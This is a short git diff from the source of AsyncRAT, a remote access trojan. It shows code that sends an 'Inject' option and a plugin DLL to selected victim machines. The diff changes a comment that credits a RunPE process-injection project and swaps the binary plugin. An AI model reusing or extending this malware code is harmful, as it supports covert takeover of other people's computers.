diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs index 063211e..0a65e29 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs @@ -499,7 +499,7 @@ namespace AsyncRAT_Sharp { msgpack.ForcePathObject("Inject").AsString = formSend.comboBox2.Text; msgpack.ForcePathObject("Plugin").SetAsBytes(Properties.Resources.Plugin); - // github.com/gigajew/WinXRunPE-x86_x64 + // github.com/Artiist/RunPE-Process-Protection } foreach (ListViewItem itm in listView1.SelectedItems) diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Plugin.dll b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Plugin.dll index 465606b..642694f 100644 Binary files a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Plugin.dll and b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Plugin.dll differ